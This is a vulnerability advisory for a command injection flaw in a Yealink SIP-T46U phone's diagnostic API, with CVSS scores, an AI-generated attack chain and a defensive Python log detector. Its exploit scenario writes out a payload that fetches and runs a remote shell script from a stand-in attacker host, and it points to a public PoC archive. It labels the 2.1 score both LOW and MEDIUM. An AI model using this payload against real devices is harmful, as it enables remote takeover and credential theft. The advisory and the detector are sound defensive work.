
Yealink SIP-T46U CVE-2026-12219

EUVD ID: EUVD-2026-36692
Severity: LOW, 2.1 (CVSS 4.0, vendor: VulDB)
Weakness: Command Injection (CWE-77)
Published: 2026-06-15 (VulDB; GHSA-85r6-756v-4x2v)

Severity by source

Vendor (VulDB), primary rating: 2.1 MEDIUM
  CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI: 8.8 HIGH
  Rationale: Network-accessible API requires only low-privilege authentication; command injection on embedded Linux yields full OS access, warranting C:H/I:H/A:H.
  CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS Vector (vendor: VulDB)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: X

Lifecycle Timeline (3 events)

Jun 15, 2026 06:24, vuln.today: Analysis generated
Jun 15, 2026 06:22, NVD: Severity changed, MEDIUM -> LOW
Jun 15, 2026 06:22, NVD: CVSS changed, 5.3 (MEDIUM) -> 2.1 (LOW)

Description (source: CVE.org)

A flaw has been found in Yealink SIP-T46U 108.86.0.118. The impacted element is the function mod_diagnose.CommandShellByType of the file /api/diagnosis/start of the component Web FastCGI Service. This manipulation of the argument Time causes command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI-generated)

Command injection in Yealink SIP-T46U firmware 108.86.0.118 enables remote authenticated attackers to execute arbitrary OS commands via the unsanitized Time argument passed to the mod_diagnose.CommandShellByType function at the /api/diagnosis/start diagnostic endpoint. The exploit leverages the Web FastCGI Service's failure to neutralize shell metacharacters before invoking underlying system commands, consistent with CWE-77. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Access: Obtain or guess low-privilege web credentials
Delivery: Send crafted HTTP POST to /api/diagnosis/start
Exploit: Inject OS commands via unsanitized Time parameter
Execution: mod_diagnose.CommandShellByType executes injected shell payload
Persist: Achieve arbitrary OS command execution on embedded Linux
Impact: Extract SIP credentials or establish persistent access

Vulnerability Assessment (AI-generated)

Exploitation: Exploitation requires an authenticated session with at least low-privilege access to the Yealink SIP-T46U web management interface, consistent with the CVSS PR:L metric. …

Risk Assessment: The provided CVSS 4.0 score of 2.1 (VC:L/VI:L/VA:L) appears to substantially understate real-world risk and is likely an artifact of conservative impact scoring by the VulDB reporter rather than a vendor-assessed rating. …

Exploit Scenario: An attacker with low-privilege credentials to the Yealink SIP-T46U web interface (obtained via default credentials, credential stuffing, or insider access) sends a crafted HTTP POST request to `/api/diagnosis/start` with the `Time` parameter set to a value containing shell metacharacters (e.g., `1; curl attacker.com/shell.sh | sh`), causing `mod_diagnose.CommandShellByType` to execute the injected command as the FastCGI service user on the embedded Linux system. The publicly available PoC exploit archive (referenced at cdn2.v50to.cc) lowers the required skill level for exploitation. …

Remediation: No vendor-released patch has been identified at the time of analysis; the vendor did not respond to disclosure, and no patched firmware version is confirmed from the available data. …
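Since no patch is confirmed, a compensating control is to watch for requests to the diagnostic endpoint whose `Time` argument is anything other than a plain number. The following Python is an added example written for this page, not code from vuln.today, VulDB or Yealink; it assumes `Time` should be a short integer (the real accepted format is not documented here) and reads the parameter from a query string in constructed access-log lines, because the actual POST body format is not on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist: a diagnostic duration as a plain integer (assumption,
# the accepted format of Time is not stated on the page).
TIME_OK = re.compile(r"^[0-9]{1,6}$")

# Shell metacharacters that have no place in a numeric duration value.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\]")

def classify_time(value):
    """Return 'ok', 'suspicious' or 'invalid' for one Time argument value."""
    if TIME_OK.match(value):
        return "ok"
    if SHELL_META.search(value):
        return "suspicious"
    return "invalid"

# Constructed access-log lines (not real captures). The parameter is carried
# in the query string only so the example is self-contained.
SAMPLE_LOG = """\
10.0.0.5 - admin [15/Jun/2026:06:20:01 +0000] "POST /api/diagnosis/start?Time=30 HTTP/1.1" 200 87
10.0.0.9 - user [15/Jun/2026:06:21:14 +0000] "POST /api/diagnosis/start?Time=1%3B%20id HTTP/1.1" 200 91
10.0.0.9 - user [15/Jun/2026:06:21:20 +0000] "GET /api/status HTTP/1.1" 200 412
10.0.0.7 - user [15/Jun/2026:06:22:45 +0000] "POST /api/diagnosis/start?Time=abc HTTP/1.1" 400 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_injection_attempts(log_text):
    """Return (src, user, decoded Time value, verdict) for every request to
    /api/diagnosis/start whose Time value is not a clean integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/api/diagnosis/start":
            continue
        # parse_qs percent-decodes, so "1%3B%20id" is inspected as "1; id".
        for raw in parse_qs(parts.query).get("Time", []):
            verdict = classify_time(raw)
            if verdict != "ok":
                hits.append((m.group("src"), m.group("user"), raw, verdict))
    return hits
```

The same `classify_time` allowlist is what a server-side fix would apply before the value ever reaches a shell.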

